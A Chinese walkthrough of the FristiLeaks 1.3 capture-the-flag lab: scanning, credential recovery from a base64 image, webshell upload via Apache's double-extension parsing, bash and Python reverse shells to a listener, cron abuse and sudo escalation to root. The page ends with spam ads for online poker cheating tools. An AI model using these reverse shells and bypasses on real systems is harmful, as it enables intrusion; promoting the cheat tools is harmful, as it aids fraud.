FRISTILEAKS: 1.3超详细靶机实战
创始人
2024-10-22 05:37:45
0

一、网卡配置

网卡设置为nat模式,并修改mac地址为

08:00:27:A5:A6:76

 

 开启虚拟机后IP地址在终端显示

 二、端口扫描

nmap 192.168.121.183 -A

 开启了80端口

访问

三、web信息收集

1.目录扫描

dirb 192.168.121.183

没什么可用信息

访问web服务找找功能点

 貌似没有可用功能点,拼接访问robots.txt

给了三个路径,访问看看

发现都是这张图

给了说明:这里不是正确的URL,还得继续寻找

最终我们拼接访问首页的FRISTI,发现新页面

 

 尝试弱口令爆破和sql注入,都无果

最后F12查看页面源码得到提示

说是对图片进行了base64加密

 这是加密的值,我们对其进行解码

base64 -d decode.txt

发现是一个png类型的文件

我们将其输出到png文件中查看

base64 -d decode.txt > decode.png

 可能是密码

我们再利用源码中的留言者作为用户,尝试登陆

eezeepz keKkeKKeKKeKkEkkEk 

登陆成功

 出现了上传文件的功能点

四、getshell

上传一句话木马,失败

这里想起来它的中间件是apache

 可以利用apache的解析漏洞,去绕过

在Apache1.x/2.x版本中,Apache默认一个文件可以有多个以点分割的后缀,解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。直到识别到合法后缀才进行解析。如 1.php.png

 上传中,我们去提示路径下查看

fristi/uploads/shell2.php.jpg

 

 成功解析

用蚁剑连接

成功获取shell

反弹shell

先用kali监听4444端口

nc -lvvp 4444

蚁剑打开虚拟终端 输入

bash -c 'bash -i >& /dev/tcp/192.168.121.171/4444 0>&1'

 

 反弹成功

五、提权

1.sudo提权

sudo -l没有权限,查看home下的用户

发现有admin、eezeepz、fristigod三个用户

在eezeepz家目录下找到notes.txt

 翻译一下:

我让你可以做一些自动检查,但我只允许您访问/usr/bin/*系统二进制文件
然而,我确实复制了一些额外的经常需要的命令到我的homedir:chmod、df、cat、echo、ps、grep、egrep,这样您就可以使用它们了
来自/home/admin/

不要忘记为每个二进制文件指定完整路径!

只需在/tmp/中放入一个名为“runthis”的文件,每行一个命令。这个输出转到/tmp/中的文件“cronresult”。它应该以我的帐户权限每分钟运行一次

可以在/tmp/目录下放一个文件名为runthis的脚本文件,反弹shell

import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.121.171",8888)); os.dup2(s.fileno(),0);  os.dup2(s.fileno(),1);  os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); 

 我这里使用kali开启远程服务,下载到目标机器上

 

然后运行这串命令

echo "/usr/bin/python /tmp/rev_shell.py" > /tmp/runthis

 kali开启8888端口监听,反弹成功

 获取admin用户的交互式shell

python -c 'import pty; pty.spawn("/bin/bash")' 

 

 看看有啥

 有两个txt、两个py脚本,看看里面有啥信息

有两串base64编码值和一个编码脚本

whoisyourgodnow.txt =RFn0AKnlMHMPIzpyuTI0ITG  cryptedpass.txt mVGZ3O3omkJLmy2pcuTq   cryptpass.py import base64,codecs,sys  def encodeString(str):     base64string= base64.b64encode(str)     return codecs.encode(base64string[::-1], 'rot13')  cryptoResult=encodeString(sys.argv[1]) print cryptoResult 

 我们对脚本进行反向操作,将加密改为解密

import base64,codecs,sys  def decodeString(str):   rot13string = codecs.decode(str[::-1], 'rot13')   return base64.b64decode(rot13string)  print(decodeString(sys.argv[1])) 

 将其保存到kali上命名为1.py

运行1.py脚本解密两串base64值

 第一串值疑似fristigod用户的密码,我们尝试登陆

sudo -l查看具有sudo权限的程序

发现可以fristi权限运行/var/fristigod/.secret_admin_stuff/doCom

 尝试以fristi权限运行一下/var/fristigod/.secret_admin_stuff/doCom

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

 说是该/var/fristigod/.secret_admin_stuff/doCom文件后面得跟着命令

输入个id试试

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id

 是root权限,那么我们可以获取root的shell

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

提权成功

相关内容

热门资讯

透视软件(aapoKer)aa... 透视软件(aapoKer)aapoker挂(透视)其实存在有挂(详细辅助曝光教程)1.aapoker...
透视肯定!德州ai辅助软件,(... 透视肯定!德州ai辅助软件,(德州nzt)都是真的是有挂(详细辅助我来教教你)1、这是跨平台的德州a...
透视代打!德州AI智能辅助机器... 透视代打!德州AI智能辅助机器人,(德州nzt)都是是有挂(详细辅助实用技巧)1、点击下载安装,德州...
透视代打(AApoker)aa... 透视代打(AApoker)aapoker有挂(透视)都是存在有挂(详细辅助专业教程)1、aapoke...
透视有挂(AAPOKER)aa... 透视有挂(AAPOKER)aapoker辅助工具存在(透视)其实是真的有挂(详细辅助大神讲解)1、每...
透视安装!德扑数据软件,(线上... 透视安装!德扑数据软件,(线上德州)一贯是有挂(详细辅助透牌教程)该软件可以轻松地帮助玩家将德扑数据...
透视辅助(德州aapoker俱... 透视辅助(德州aapoker俱乐部)aapoker俱乐部(透视)确实存在有挂(详细辅助2025新版教...
透视能赢!德州免费辅助神器ap... 透视能赢!德州免费辅助神器app,(线上wpk德州)一直有挂(详细辅助安装教程)1、玩家可以在德州免...
透视好牌(aapokeR)aa... 透视好牌(aapokeR)aapoker辅助(透视)原来真的是有挂(详细辅助AI教程);1、用户打开...
透视辅助!德州之星外挂,(德扑... 透视辅助!德州之星外挂,(德扑之星)总是真的是有挂(详细辅助普及教程)1、金币登录送、破产送、升级送...